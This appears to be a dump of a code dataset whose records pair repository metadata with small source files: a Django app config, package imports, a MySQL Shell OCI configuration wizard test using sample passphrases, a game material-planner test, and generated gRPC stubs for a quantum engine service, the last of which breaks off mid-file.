9dd1b1bf91223383938b844ed484de2d3b949a4d
|
[
"MIT"
] | null | null | null |
backend/api/apps.py
|
DataHack-CSCE606/django-vue-template
|
9dd1b1bf91223383938b844ed484de2d3b949a4d
|
[
"MIT"
] | 1
|
2021-04-26T04:48:16.000Z
|
2021-04-26T04:48:16.000Z
|
backend/api/apps.py
|
DataHack-CSCE606/django-vue-template
|
9dd1b1bf91223383938b844ed484de2d3b949a4d
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig # pragma: no cover
# Django application config for the backend.api app.
# NOTE(review): this class shadows the imported django AppConfig name. It
# still works because the base-class reference is resolved before the new
# binding is created, but a distinct name (e.g. ApiConfig) would be clearer —
# confirm nothing (settings INSTALLED_APPS, default_app_config) references
# "backend.api.apps.AppConfig" before renaming.
class AppConfig(AppConfig):  # pragma: no cover
    name = 'backend.api'  # pragma: no cover
| 24.333333
| 52
| 0.719178
| 20
| 146
| 5.25
| 0.6
| 0.228571
| 0.371429
| 0.419048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184932
| 146
| 5
| 53
| 29.2
| 0.882353
| 0.342466
| 0
| 0
| 0
| 0
| 0.119565
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3186641765b59eb0977a40b3133661ae28375d4
| 144
|
py
|
Python
|
mutant/db/fields/__init__.py
|
pombredanne/django-mutant
|
bb7ae91c0ceb77e1a4b98e8ba8892548f5d8c0f2
|
[
"MIT"
] | 152
|
2015-02-08T05:34:06.000Z
|
2022-03-10T01:06:27.000Z
|
mutant/db/fields/__init__.py
|
pombredanne/django-mutant
|
bb7ae91c0ceb77e1a4b98e8ba8892548f5d8c0f2
|
[
"MIT"
] | 35
|
2015-01-03T17:21:38.000Z
|
2021-09-30T21:09:21.000Z
|
mutant/db/fields/__init__.py
|
pombredanne/django-mutant
|
bb7ae91c0ceb77e1a4b98e8ba8892548f5d8c0f2
|
[
"MIT"
] | 31
|
2015-04-25T14:49:07.000Z
|
2021-12-28T17:53:47.000Z
|
from mutant.db.fields.generic import * # NOQA
from mutant.db.fields.python import * # NOQA
from mutant.db.fields.translation import * # NOQA
| 36
| 50
| 0.75
| 21
| 144
| 5.142857
| 0.428571
| 0.277778
| 0.333333
| 0.5
| 0.518519
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 144
| 3
| 51
| 48
| 0.878049
| 0.097222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b36aa1fa58ba2390cd65eb36500f5db1153bfb58
| 7,722
|
py
|
Python
|
unittest/scripts/auto/py_shell/scripts/shell_configure_oci_norecord.py
|
dveeden/mysql-shell
|
66610494cc96a4718c6b23c603e9a6e3234a984e
|
[
"Apache-2.0"
] | null | null | null |
unittest/scripts/auto/py_shell/scripts/shell_configure_oci_norecord.py
|
dveeden/mysql-shell
|
66610494cc96a4718c6b23c603e9a6e3234a984e
|
[
"Apache-2.0"
] | null | null | null |
unittest/scripts/auto/py_shell/scripts/shell_configure_oci_norecord.py
|
dveeden/mysql-shell
|
66610494cc96a4718c6b23c603e9a6e3234a984e
|
[
"Apache-2.0"
] | null | null | null |
#@{__python_deps==1}
import os

# Paths for the OCI configuration the wizard writes: <home>/.oci/config plus
# a default API key pair stored as PEM files in the same folder.
# __home is provided by the shell test framework — not defined in this file.
# Fix: dropped the stray trailing semicolons (unidiomatic in Python).
oci_folder = '.oci'
config_name = 'config'
def_key_name = 'oci_api_key'
def_public_key_name = 'oci_api_key_public'
oci_path = os.path.join(__home, oci_folder)
config_path = os.path.join(oci_path, config_name)
def_key_path = os.path.join(oci_path, def_key_name) + '.pem'
def_public_key_path = os.path.join(oci_path, def_public_key_name) + '.pem'
#@ Test first configuration attempt
# Queue one canned answer per interactive prompt. Invalid entries (bad OCID
# format, region "8", empty region, mismatched passphrase) are presumably
# re-asked by the wizard before a valid answer is accepted — the recorded
# output validates the exact dialogue.
testutil.expect_prompt("Please enter your USER OCID:", "invalid-format-ocid");
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "invalid-format-tenancy-id");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "8");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "1");
testutil.expect_prompt("Please enter the number of an option listed above:", "1");
testutil.expect_prompt("Do you want to protect the API key with a passphrase? [Y/n]:", "");
testutil.expect_password("Enter a passphrase for the API key:", "MySamplePwd");
testutil.expect_password("Enter the passphrase again for confirmation:", "UnmatchedPwd");
testutil.expect_password("Enter the passphrase again for confirmation:", "MySamplePwd");
testutil.expect_prompt("Do you want to write your passphrase to the config file? [y/N]:", "y");
util.configure_oci()
# Report which artifacts the wizard created, then dump the config file.
print ("OCI Path Exists: %s" % os.path.exists(oci_path));
print ("Config File Exists: %s" % os.path.exists(config_path));
print ("Key Path Exists: %s" % os.path.exists(def_key_path));
print ("Public Key Path Exists: %s" % os.path.exists(def_public_key_path));
with open(config_path, 'r') as file:
    print(file.read())
#@ Second configuration attempt, profile already exists
# No prompts are queued: with the DEFAULT profile already written by the
# first attempt, the call presumably stops early — the recorded output
# validates the exact message.
util.configure_oci()
#@ Second configuration attempt, custom region, same key file
# Creates profile 'second' with a free-form region name, reusing the default
# key pair; a wrong passphrase is entered first, then the correct one.
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "my-custom-region");
testutil.expect_prompt("Please enter the number of an option listed above:", "1");
testutil.expect_password("The selected API key requires a passphrase:", "WrongPwd");
testutil.expect_password("Wrong passphrase, please try again:", "MySamplePwd");
testutil.expect_prompt("Do you want to write your passphrase to the config file? [y/N]:", "y");
util.configure_oci('second')
with open(config_path, 'r') as file:
    print(file.read())
#@ Third configuration attempt, creates yet another key file
# Creates profile 'third' with a brand-new key pair. Empty, invalid, and
# already-taken key names are entered first; the recorded output validates
# that each one is rejected before 'my_sample_key' is accepted.
key_name = 'my_sample_key'
public_key_name = 'my_sample_key_public'
key_path = os.path.join(oci_path, key_name) + '.pem';
public_key_path = os.path.join(oci_path, public_key_name) + '.pem';
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "2");
testutil.expect_prompt("Please enter the number of an option listed above:", "2");
testutil.expect_prompt("Enter the name of the new API key:", "");
testutil.expect_prompt("Enter the name of the new API key:", "invalid key name");
testutil.expect_prompt("Enter the name of the new API key:", def_key_name);
testutil.expect_prompt("Enter the name of the new API key:", key_name);
testutil.expect_prompt("Do you want to protect the API key with a passphrase? [Y/n]:", "n");
util.configure_oci('third')
print ("Key Path Exists: %s" % os.path.exists(key_path));
print ("Public Key Path Exists: %s" % os.path.exists(public_key_path));
with open(config_path, 'r') as file:
    print(file.read())
#@ Fourth configuration attempt, uses an existing KEY without password
# Creates profile 'fourth' pointing at the passphrase-less key from the
# third attempt. An empty location, a directory, and a nonexistent path are
# entered first — presumably each is rejected before the real key path.
unexisting_path = os.path.join(oci_path, 'unexisting')
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "4");
testutil.expect_prompt("Please enter the number of an option listed above:", "3");
testutil.expect_prompt("Enter the location of the existing API key:", "");
testutil.expect_prompt("Enter the location of the existing API key:", oci_path);
testutil.expect_prompt("Enter the location of the existing API key:", unexisting_path);
testutil.expect_prompt("Enter the location of the existing API key:", key_path);
util.configure_oci('fourth')
print ("Key Path Exists: %s" % os.path.exists(key_path));
print ("Public Key Path Exists: %s" % os.path.exists(public_key_path));
with open(config_path, 'r') as file:
    print(file.read())
#@ Fifth configuration attempt, uses an existing KEY with password, savng password
# NOTE(review): "savng" typo left as-is — the #@ marker text may be matched
# against previously recorded output; fix both together if at all.
# Creates profile 'fifth' reusing the passphrase-protected default key and
# writing the passphrase into the config file.
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "4");
testutil.expect_prompt("Please enter the number of an option listed above:", "3");
testutil.expect_prompt("Enter the location of the existing API key:", def_key_path);
testutil.expect_password("The selected API key requires a passphrase:", "MySamplePwd");
testutil.expect_prompt("Do you want to write your passphrase to the config file? [y/N]:", "y");
util.configure_oci('fifth')
print ("Key Path Exists: %s" % os.path.exists(key_path));
print ("Public Key Path Exists: %s" % os.path.exists(public_key_path));
#@ Sixth configuration attempt, uses an existing KEY with password, NOT saving password
# NOTE(review): the marker says "NOT saving password", yet the script answers
# "y" to the save prompt and reuses the profile name 'fifth' — this looks
# like a copy-paste of the fifth attempt. Confirm whether the answer should
# be "n" and the profile 'sixth'; left unchanged since the recorded output
# matches the current behavior.
testutil.expect_prompt("Please enter your USER OCID:", "ocid1.user.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter your TENANCY OCID:", "ocid1.tenancy.oc1..abcdfgetrhjzqdlgnqlrmzclepeihqrjtqmbwz6s562ywdyikr5gr7izfhlq");
testutil.expect_prompt("Please enter the number of a REGION listed above or type a custom region name:", "4");
testutil.expect_prompt("Please enter the number of an option listed above:", "3");
testutil.expect_prompt("Enter the location of the existing API key:", def_key_path);
testutil.expect_password("The selected API key requires a passphrase:", "MySamplePwd");
testutil.expect_prompt("Do you want to write your passphrase to the config file? [y/N]:", "y");
util.configure_oci('fifth')
print ("Key Path Exists: %s" % os.path.exists(key_path));
print ("Public Key Path Exists: %s" % os.path.exists(public_key_path));
with open(config_path, 'r') as file:
    print(file.read())
#@ Cleanup
# Remove every file the test created, then the now-empty .oci folder
# (os.rmdir fails if anything is left behind, which is intentional).
# Fix: dropped the stray trailing semicolons (unidiomatic in Python).
os.remove(config_path)
os.remove(def_key_path)
os.remove(def_public_key_path)
os.remove(key_path)
os.remove(public_key_path)
os.rmdir(oci_path)
| 55.553957
| 141
| 0.775188
| 1,107
| 7,722
| 5.268293
| 0.097561
| 0.122428
| 0.150892
| 0.124829
| 0.858025
| 0.844479
| 0.826989
| 0.819787
| 0.76869
| 0.748114
| 0
| 0.015722
| 0.102176
| 7,722
| 138
| 142
| 55.956522
| 0.825472
| 0.060995
| 0
| 0.5
| 0
| 0
| 0.536316
| 0.13187
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.13
| 0.01
| 0
| 0.01
| 0.17
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2faf8c67983d53e0b7c0b7e9ebc390ce6b0789f6
| 38
|
py
|
Python
|
test/pytch/py/project/just_import.py
|
Liampobob/pytch-vm
|
bb2cf19c0736d467daf195635a9de9903aaa1237
|
[
"MIT"
] | 2
|
2021-11-29T09:47:23.000Z
|
2022-02-11T15:48:20.000Z
|
test/pytch/py/project/just_import.py
|
Liampobob/pytch-vm
|
bb2cf19c0736d467daf195635a9de9903aaa1237
|
[
"MIT"
] | 1
|
2022-02-28T13:50:48.000Z
|
2022-02-28T13:50:48.000Z
|
test/pytch/py/project/just_import.py
|
Liampobob/pytch-vm
|
bb2cf19c0736d467daf195635a9de9903aaa1237
|
[
"MIT"
] | 4
|
2021-02-12T15:27:33.000Z
|
2022-03-16T10:26:55.000Z
|
import pytch.project as pytch_project
| 19
| 37
| 0.868421
| 6
| 38
| 5.333333
| 0.666667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 38
| 1
| 38
| 38
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ff66eabcbc6bb8c6ceb65a9a349fd09c8edcb917
| 34
|
py
|
Python
|
src/test/lexer_test.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 76
|
2020-04-03T01:21:47.000Z
|
2021-12-06T02:54:53.000Z
|
src/test/lexer_test.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 7
|
2020-04-06T04:44:10.000Z
|
2021-05-17T12:38:15.000Z
|
src/test/lexer_test.py
|
olirice/nebulo
|
de9b043fe66d0cb872c5c0f2aca3c5c6f20918a7
|
[
"MIT"
] | 2
|
2020-10-23T10:25:16.000Z
|
2020-10-28T14:16:57.000Z
|
def test_lexer_import():
    """Smoke test: succeeds if the test module itself imports cleanly."""
| 11.333333
| 24
| 0.705882
| 5
| 34
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205882
| 34
| 2
| 25
| 17
| 0.814815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0.5
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
ff954804b7a748fb7a3c1c04afe1d494e15cb870
| 174
|
py
|
Python
|
awspider/__init__.py
|
wehriam/awspider
|
3d3dc40208fb334a6b6cdaae92f5d5ea07295616
|
[
"MIT"
] | 2
|
2016-05-09T14:59:51.000Z
|
2021-11-22T02:35:39.000Z
|
awspider/__init__.py
|
wehriam/awspider
|
3d3dc40208fb334a6b6cdaae92f5d5ea07295616
|
[
"MIT"
] | null | null | null |
awspider/__init__.py
|
wehriam/awspider
|
3d3dc40208fb334a6b6cdaae92f5d5ea07295616
|
[
"MIT"
] | 2
|
2022-02-27T19:55:42.000Z
|
2022-03-08T07:20:53.000Z
|
from .servers import DataServer
from .servers import ExecutionServer
from .servers import InterfaceServer
from .servers import AdminServer
from .plugin import AWSpiderPlugin
| 29
| 36
| 0.856322
| 20
| 174
| 7.45
| 0.45
| 0.295302
| 0.456376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114943
| 174
| 5
| 37
| 34.8
| 0.967532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ff9dbcf5891b9088f2e793195c40ff2f0a13b892
| 142
|
py
|
Python
|
backend-project/small_eod/administrative_units/factories.py
|
WlodzimierzKorza/small_eod
|
027022bd71122a949a2787d0fb86518df80e48cd
|
[
"MIT"
] | 64
|
2019-12-30T11:24:03.000Z
|
2021-06-24T01:04:56.000Z
|
backend-project/small_eod/administrative_units/factories.py
|
WlodzimierzKorza/small_eod
|
027022bd71122a949a2787d0fb86518df80e48cd
|
[
"MIT"
] | 465
|
2018-06-13T21:43:43.000Z
|
2022-01-04T23:33:56.000Z
|
backend-project/small_eod/administrative_units/factories.py
|
WlodzimierzKorza/small_eod
|
027022bd71122a949a2787d0fb86518df80e48cd
|
[
"MIT"
] | 72
|
2018-12-02T19:47:03.000Z
|
2022-01-04T22:54:49.000Z
|
from teryt_tree.factories import JednostkaAdministracyjnaFactory
class AdministrativeUnitFactory(JednostkaAdministracyjnaFactory):
pass
| 23.666667
| 65
| 0.880282
| 10
| 142
| 12.4
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091549
| 142
| 5
| 66
| 28.4
| 0.96124
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
44317a518ed048c70963e7ba74dcf82dd0f43095
| 1,788
|
py
|
Python
|
test/test_planner.py
|
cytopz/arknights-farmer
|
4140880b61a2fd08c0d2a5f51b1c8e9a65be6afc
|
[
"MIT"
] | 4
|
2020-09-09T10:43:21.000Z
|
2021-05-27T22:50:33.000Z
|
test/test_planner.py
|
rahagi/arknights-farmer
|
4140880b61a2fd08c0d2a5f51b1c8e9a65be6afc
|
[
"MIT"
] | null | null | null |
test/test_planner.py
|
rahagi/arknights-farmer
|
4140880b61a2fd08c0d2a5f51b1c8e9a65be6afc
|
[
"MIT"
] | null | null | null |
from arknights_farmer.penguin import planner
stri = """
[{"id":"30135","name":"D32钢","need":0,"have":0},{"id":"30125","name":"双极纳米片","need":0,"have":0},{"id":"30115","name":"聚合剂","need":4,"have":0},{"id":"30074","name":"白马醇","need":0,"have":0},{"id":"30073","name":"扭转醇","need":0,"have":0},{"id":"30084","name":"三水锰矿","need":0,"have":0},{"id":"30083","name":"轻锰矿","need":0,"have":0},{"id":"30094","name":"五水研磨石","need":0,"have":0},{"id":"30093","name":"研磨石","need":0,"have":0},{"id":"30104","name":"RMA70-24","need":0,"have":0},{"id":"30103","name":"RMA70-12","need":0,"have":0},{"id":"30014","name":"提纯源岩","need":0,"have":0},{"id":"30013","name":"固源岩组","need":30,"have":0},{"id":"30012","name":"固源岩","need":0,"have":0},{"id":"30011","name":"源岩","need":0,"have":0},{"id":"30064","name":"改量装置","need":0,"have":0},{"id":"30063","name":"全新装置","need":0,"have":0},{"id":"30062","name":"装置","need":0,"have":0},{"id":"30061","name":"破损装置","need":0,"have":0},{"id":"30034","name":"聚酸酯块","need":0,"have":0},{"id":"30033","name":"聚酸酯组","need":0,"have":0},{"id":"30032","name":"聚酸酯","need":0,"have":0},{"id":"30031","name":"酯原料","need":0,"have":0},{"id":"30024","name":"糖聚块","need":0,"have":0},{"id":"30023","name":"糖组","need":0,"have":0},{"id":"30022","name":"糖","need":0,"have":0},{"id":"30021","name":"代糖","need":0,"have":0},{"id":"30044","name":"异铁块","need":0,"have":0},{"id":"30043","name":"异铁组","need":0,"have":0},{"id":"30042","name":"异铁","need":0,"have":0},{"id":"30041","name":"异铁碎片","need":0,"have":0},{"id":"30054","name":"酮阵列","need":0,"have":0},{"id":"30053","name":"酮凝集组","need":0,"have":0},{"id":"30052","name":"酮凝集","need":0,"have":0},{"id":"30051","name":"双酮","need":0,"have":0}]
"""
print(planner.get_route(stri))
print({x['stage']: x['count'] for x in planner.get_route(stri)})
| 198.666667
| 1,629
| 0.541387
| 306
| 1,788
| 3.153595
| 0.303922
| 0.181347
| 0.246632
| 0.341969
| 0.397927
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144633
| 0.010067
| 1,788
| 8
| 1,630
| 223.5
| 0.400565
| 0
| 0
| 0
| 0
| 0.166667
| 0.917785
| 0.911074
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.333333
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4473e0a00ab55b6254ce60b636421e37dd381ab9
| 30,844
|
py
|
Python
|
cirq/google/engine/client/quantum_v1alpha1/proto/engine_pb2_grpc.py
|
exAClior/Cirq
|
0701327bc66c988428f302dd1e4bed1eef1535a6
|
[
"Apache-2.0"
] | 1
|
2021-01-05T19:47:55.000Z
|
2021-01-05T19:47:55.000Z
|
cirq/google/engine/client/quantum_v1alpha1/proto/engine_pb2_grpc.py
|
rohitvuppala/Cirq
|
0ff2894e053e4ce3bb1b54e9b9de1cc4345d10b3
|
[
"Apache-2.0"
] | 4
|
2021-01-11T10:35:37.000Z
|
2021-01-28T19:17:02.000Z
|
cirq/google/engine/client/quantum_v1alpha1/proto/engine_pb2_grpc.py
|
rohitvuppala/Cirq
|
0ff2894e053e4ce3bb1b54e9b9de1cc4345d10b3
|
[
"Apache-2.0"
] | 1
|
2021-12-30T21:50:00.000Z
|
2021-12-30T21:50:00.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from cirq.google.engine.client.quantum_v1alpha1.proto import (
engine_pb2 as google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2,
)
from cirq.google.engine.client.quantum_v1alpha1.proto import (
quantum_pb2 as google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class QuantumEngineServiceStub(object):
"""-
-
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateQuantumProgram = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CreateQuantumProgram',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumProgramRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.FromString,
)
self.GetQuantumProgram = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumProgram',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumProgramRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.FromString,
)
self.ListQuantumPrograms = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumPrograms',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProgramsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProgramsResponse.FromString,
)
self.DeleteQuantumProgram = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/DeleteQuantumProgram',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumProgramRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.UpdateQuantumProgram = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/UpdateQuantumProgram',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumProgramRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.FromString,
)
self.CreateQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CreateQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.FromString,
)
self.GetQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.FromString,
)
self.ListQuantumJobs = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumJobs',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobsResponse.FromString,
)
self.DeleteQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/DeleteQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.UpdateQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/UpdateQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.FromString,
)
self.CancelQuantumJob = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/CancelQuantumJob',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CancelQuantumJobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ListQuantumJobEvents = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumJobEvents',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobEventsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobEventsResponse.FromString,
)
self.GetQuantumResult = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumResult',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumResultRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumResult.FromString,
)
self.ListQuantumProcessors = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/ListQuantumProcessors',
request_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProcessorsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProcessorsResponse.FromString,
)
self.GetQuantumProcessor = channel.unary_unary(
'/google.cloud.quantum.v1alpha1.QuantumEngineService/GetQuantumProcessor',
